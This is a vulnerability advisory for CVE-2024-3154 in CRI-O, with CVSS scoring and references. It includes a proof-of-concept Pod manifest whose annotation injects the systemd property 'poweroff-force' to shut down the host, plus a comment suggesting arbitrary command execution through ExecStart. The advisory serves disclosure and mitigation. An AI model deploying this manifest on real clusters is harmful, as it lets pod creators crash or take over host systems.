CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
13.0%
On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
---
apiVersion: v1
kind: Pod
metadata:
name: poc-arbitrary-systemd-property-injection
annotations:
# I believe that ExecStart with an arbitrary command works here too,
# but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
containers:
- name: hello
image: [quay.io/podman/hello](http://quay.io/podman/hello)
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Tested with CRI-O v1.24 on minikube.
I didnβt test the latest v1.29 because it is incompatible with minikube: https://github.com/kubernetes/minikube/pull/18367
Thanks to CΓ©dric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
https://github.com/opencontainers/runc/pull/3923#discussion_r1532292536
CRI-O has to filter out annotations that have the prefix βorg.systemd.property.β
See also:
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations
access.redhat.com/security/cve/CVE-2024-3154
bugzilla.redhat.com/show_bug.cgi?id=2272532
github.com/cri-o/cri-o
github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j
github.com/opencontainers/runc/pull/4217
github.com/opencontainers/runtime-spec/blob/main/features.md#unsafe-annotations-in-configjson
nvd.nist.gov/vuln/detail/CVE-2024-3154